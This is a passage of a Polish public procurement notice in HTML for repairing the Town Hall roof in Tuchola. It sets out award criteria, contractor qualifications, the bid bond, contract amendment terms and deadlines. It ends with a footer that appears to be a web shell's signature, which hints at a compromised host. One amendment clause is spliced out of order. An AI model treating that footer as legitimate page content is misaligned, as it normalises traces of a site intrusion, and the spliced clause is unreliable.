wynagrodzenia Wykonawcy, co stanowi kwotę ………………………… (słownie złotych: …………………………………………………) – nastąpi w terminie 1 miesiąca od dnia przekazania terenu budowy (po otrzymaniu zaliczki należy wystawić fakturę zaliczkową), <br/>- II transza – pozostała kwota wynagrodzenia, tj. ……………………………… (słownie złotych: …………………………………………………) – wypłacona po zakończeniu inwestycji ze środków dofinansowania.<br/>Do faktury końcowej należy załączyć rozliczenie (kosztorys powykonawczy) potwierdzone przez Inspektorów nadzoru inwestorskiego.<br/>3.7.	Wszelkie informacje niezbędne do przygotowania oferty dostępne są na stronie internetowej<br/>prowadzonego postępowanie. Link do postępowania dostępny jest na Profilu Nabywcy <br/>zamawiającego: https://platformazakupowa.pl/tuchola. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na podstawie<br/>kryteriów oceny ofert określonych w SWZ<br/>Opis kryteriów oceny Znaczenie<br/>A. cena 60%<br/>B. okres gwarancji jakości 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdz. 6 i 7 SWZ oraz spełniają warunki udziału w postępowaniu <br/>w zakresie:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny,<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości min. 200 000,00 zł;<br/>4)	zdolności technicznej lub zawodowej:<br/>A)	A (dotyczy wykazu robót) <br/><br/>Wykonawca wykaże, że zrealizował należycie min. jedną robotę polegającą na remoncie / przebudowie budynku/ obiektu – w tym dachu oraz wymianie stolarki okiennej oraz aby dołączył do ww. wykazu min. 1 szt. referencji na wykonane roboty<br/>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu jeżeli przedstawi w wykazie wykonanych robót – roboty wykonane, podając ich rodzaj, wartość, datę, miejsce wykonania i podmioty na rzecz, których roboty zostały wykonane, według wzoru stanowiącego załącznik nr 9 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót, potwierdzającym, że robota budowlana została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>B (dotyczy wykazu osób): skieruje do realizacji przedmiotowego zamówienia min. po jednej osobie z niżej wymienionych branży posiadającą uprawnienia do kierowania i nadzorowania robotami budowlanymi w zakresie odpowiadającym wymienionym niżej branżom lub posiadającą inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane wymienionych specjalności:<br/>	kierownika budowy – br. konstrukcyjno-budowlanej, posiadającą uprawnienia do kierowania robotami w specjalności konstrukcyjno-budowlanej,<br/>Wykonawca skieruje do realizacji zamówienia ww. osoby, które w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2023 r. poz. 682 z późn. zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego posiadają niezbędne kwalifikacje do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831). <br/>Dopuszcza się łączenie funkcji, o których mowa powyżej, przez jedną osobę pod warunkiem, że osoba ta będzie posiadała wymagane kwalifikacje.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t. j. Dz. U. z 2023 r. poz. 682 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j.Dz. U. z 2021 r. poz. 1646).<br/>8.2.Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności ,jeżeli posiadane przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">10.1.2.	W celu potwierdzenia braku podstaw do wykluczenia:<br/>1)	- oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2022r. poz. 1233 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 7 do SWZ.<br/>2)	- oświadczenie Wykonawcy o aktualności oświadczenia składanego na podst. art. 125 ust.1.ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023r. poz. 1497 z późn. zm.) według wzoru stanowiącego załącznik nr 11 do SWZ;<br/>3)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>10.2. Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, lub podmiotowe środki dowodowe budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę warunków udziału w postępowaniu, kryteriów selekcji lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>10.3.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>- może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, <br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp dane umożliwiające dostęp do tych środków;<br/>- podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">10.1.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, chyba że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych tj.: <br/>10.1.1.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu:<br/>1)	wykaz wykonanych robót budowlanych,(przynajmniej jedna robota budowlana) -wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, według wzoru stanowiącego załącznik nr 9 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót budowlanych, potwierdzające, że roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego załącznik nr 6. <br/>3)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.5. Ofertę składa się na formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) Pełnomocnictwo (jeżeli dotyczy) wzór pełnomocnictwa załącznik nr 8 - dla osoby podpisującej ofertę do występowania w<br/>imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58<br/>ust. 2 ustawy Prawo zamówień publicznych.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie<br/>elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu)<br/>pełnomocnictwasporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego<br/>stosownie do art. 97<br/>§ 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa<br/>nie może być uwierzytelniona przez upełnomocnionego.<br/>2) Oświadczenia wymienione w rozdziale 9 pkt 1 niniejszej SWZ tj.<br/>a) oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp- załącznik nr 3 do SWZ<br/>b) oświadczenie składane na podstawie art. 117 ust. 4 Pzp– dotyczy tylko wykonawców wspólnie ubiegających się o<br/>zamówienie, zgodnie z załącznikiem nr 10 do SWZ.<br/>c) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w pkt. 1) SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z załącznikiem nr 4 do SWZ.<br/>d) zobowiązanie podmiotu udostępniającego zasoby – w przypadku gdy wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, zgodnie ze wzorem stanowiącym<br/>załącznik nr 5 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów<br/>e) wadium w wymaganej formie, zgodnie z rozdz. 15 SWZ.<br/>przewidziana w art. 7 ust.1. ustawy z dnia 13 kwietnia 2022 r.o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835)<br/>Wymagane jest oświadczenie o niepodleganiu wykluczeniu na podst. w.w. ustawy.<br/>Zapis o niepodleganiu umieszczono w oświadczeniu składanym na podst. art.125 ust. 1 ust. Pzp (zał.3,zał.4 do SWZ) oraz<br/>oświadczeniu o aktualności oświadczenia wykonawcy o niepodleganiu wykluczeniu (zał. nr 11 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium zamówienia wskazując tytuł:<br/>„wadium, nr postępowania ZP.271.2.27.2024.AS – „Renowacja zabytków położonych w Tucholi przy pl. Zamkowym 1 (Urząd Miejski), ul. Chojnickiej 27 (kamienica mieszkalna) i ul. Świeckiej 58 (cmentarz parafialny) - Remont dachu Urzędu Miejskiego w Tucholi”<br/>16.2.	Zamawiający wymaga wniesienia wadium w wysokości: 3 000,00 zł (słownie: trzy tysiące zł 00/100)<br/>16.3.	Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>16.4.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/>16.5.	Bank Spółdzielczy w Tucholi Nr 15 8174 0004 0000 2163 2000 0005<br/>16.6.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2013 r. poz. 462 z późn. zm.).<br/>16.7.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>16.8.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 15.5. ppkt 2)-4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej, podpisany kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>16.9.	W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego (beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6 ustawy. <br/>16.10.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3, zostanie odrzucona. <br/>16.11.	Zamawiający niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku przez Wykonawcę zwraca wadium Wykonawcy:<br/>1)	który wycofał ofertę przed upływem terminu składania ofert;<br/>2)	którego oferta została odrzucona;<br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Szczegółowe informacje dotyczące wadium zawarto w w rozdz. 16 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 19.2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>19.3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w rozdziale 8 pkt 8.1., składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>19.4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zgodnie ze wzorem umowy stanowiącym załącznik nr 12 do SWZ w § 6 zawarto zapis:<br/>Strony postanawiają, że rozliczenie za przedmiot umowy będzie następowało w II transzach:<br/>- I transza – w formie zaliczki w kwocie nie mniejszej niż 2% wynagrodzenia Wykonawcy, co stanowi kwotę<br/>………………………… (słownie złotych: …………………………………………………) – nastąpi w terminie 1 miesiąca od dnia<br/>przekazania terenu budowy (po otrzymaniu zaliczki należy wystawić fakturę zaliczkową),<br/>- II transza – pozostała kwota wynagrodzenia, tj. ……………………………… (słownie złotych:<br/>…………………………………………………) – wypłacona po zakończeniu inwestycji ze środków dofinansowania. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej<br/>umowy, określone zostały w załączniku nr 12 do SWZ.<br/>22.2. Zgodnie z załącznikiem nr 12 do SWZ – wzorem umowy, Zamawiający dopuszcza możliwość wprowadzenia zmian<br/>umowy:<br/>„Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:<br/>1) W zakresie zmiany terminu wykonania:<br/>a) z powodu wystąpienia nie zinwentaryzowanych urządzeń podziemnych i związanych z tym kolizji,<br/>b) z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,<br/>c) wystąpienia siły wyższej i innych zdarzeń nadzwyczajnych,<br/>d) z powodu ujawnienia się wad/braków/błędów w dokumentacji projektowej skutkujących niemożliwością dochowania<br/>pierwotnego terminu realizacji umowy,<br/>e) z powodu wystąf) w przypadku wystąpienia okoliczności niezależnych od stron, związanych z zaistnieniem warunków atmosferycznych<br/>uniemożliwiających wykonywanie robót zgodnie z ich przewidywaną technologią wykonania, także przeprowadzania prób i<br/>sprawdzeń zgodnie z technologią przewidzianą przez producentów, termin realizacji zamówienia może zostać wydłużony,<br/>g) z powodu warunków geologicznych, archeologicznych, terenowych, w szczególności:<br/>- niewypałów i niewybuchów;<br/>- wykopalisk archeologicznych;<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, kurzawka, głazy<br/>narzutowe, warunki gruntowe itp.);<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie podziemnych<br/>sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty itp.);<br/>h) w związku z wystąpieniem następstw działania organów administracji, które w szczególności dotyczyć będą:<br/>- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień<br/>itp.;<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji<br/>projektowej;<br/>i) w związku z zaistnieniem uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do<br/>dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron;<br/>j) w związku z wystąpieniem innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz od Wykonawcy<br/>skutkujących niemożliwością prowadzenia prac, w szczególności: brak możliwości dojazdu oraz transportu materiałów na<br/>teren budowy spowodowany awariami, remontami lub przebudowami dróg dojazdowych, protesty mieszkańców, przerwy w<br/>dostawie energii elektrycznej, wody, gazu;<br/>k) w związku z wystąpieniem innych przyczyn leżących po stronie Zamawiającego, które w szczególności dotyczyć będą:<br/>- nieterminowego przekazania terenu budowy przez Zamawiającego;<br/>- wstrzymania robót przez Zamawiającego;<br/>- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>- przedłużającej się procedury wyboru oferty – powyżej 30 dni;<br/>z zastrzeżeniem, że w przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowy<br/>może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty,<br/>nie dłużej jednak niż o okres trwania tych okoliczności;<br/>l) z uwagi na opóźnienia w dostawach materiałów i urządzeń.<br/>2) W przypadku późnego rozstrzygnięcia konkursów o dofinansowanie termin realizacji zadania ulegnie przedłużeniu.<br/>3) W zakresie płatności i innych:<br/>a) aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło<br/>niewykonaniem lub wadliwym wykonaniem projektu,<br/>(...)<br/>Szczegółowe informacje o zmianach umowy zawarto w rozdziale 22 SWZ oraz zał. nr 12 do SWZ - wzorze umowy.pienia klęsk żywiołowych, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy zakupowej: https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przewidziana w art. 7 ust.1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835) . Wymagane<br/>jest oświadczenie o niepodleganiu wykluczeniu na podst. w.w. ustawy. Zapis o niepodleganiu umieszczono w oświadczeniu<br/>składanym na podst. art.125 ust.1 ust. Pzp (zał.3, zał.4 do SWZ) oraz oświadczeniu o aktualności oświadczenia wykonawcy<br/>o niepodleganiu wykluczeniu (zał. nr 11 do SWZ).<br/>21.1. Zamawiający zawrze umowę z Wykonawcą, który złożył najkorzystniejszą ofertę w niniejszym postępowaniu.<br/>21.2. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577 Pzp, w terminie nie<br/>krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało<br/>przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób.<br/>21.3. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt<br/>21.2, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę.<br/>21.4. Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, będzie zobowiązany zawrzeć umowę w sprawie<br/>zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 12 do SWZ.<br/>Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>21.5. Wykonawca, przed podpisaniem umowy, powinien przedłożyć:<br/>- w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowakonsorcjum lub umowa spółki cywilnej).<br/>21.6. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w<br/>postępowaniu wykonawców albo unieważnić postępowanie (art. 263 ustawy Pzp).<br/>21.7. Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez zamawiającego o<br/>miejscu i terminie podpisania umowy.<br/>21.8. Najpóźniej w dniu podpisania umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu<br/>-dokument potwierdzający wniesienie zabezpieczenia należytego wykonania zamówienia,<br/>-kosztorys ofertowy,<br/>-najpóźniej w dniu przekazania placu budowy, złoży wykaz osób oddelegowanych do realizacji zamówienia wraz z<br/>oświadczeniem o tym, że są zatrudnieni na podstawie umowy o pracę;<br/>-w przypadku wykonawców występujących wspólnie – kopię umowy regulującej współpracę tych Wykonawców<br/>zawierającą w swojej treści następujące postanowienia:<br/>sposób ich współdziałania,<br/>• zakres czynności powierzonych do wykonania każdemu z nich,<br/>• numer i nazwę rachunku bankowego, na który będą dokonywane płatności z tytułu realizacji kontraktu,<br/>• solidarną odpowiedzialność za wykonanie zamówienia,<br/>• wskazanie, że jeden z Wykonawców jest upoważniony do zaciągania zobowiązań i do przyjmowania instrukcji na rzecz i w<br/>imieniu wszystkich Wykonawców razem i każdego z osobna oraz do przyjmowania płatności od Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com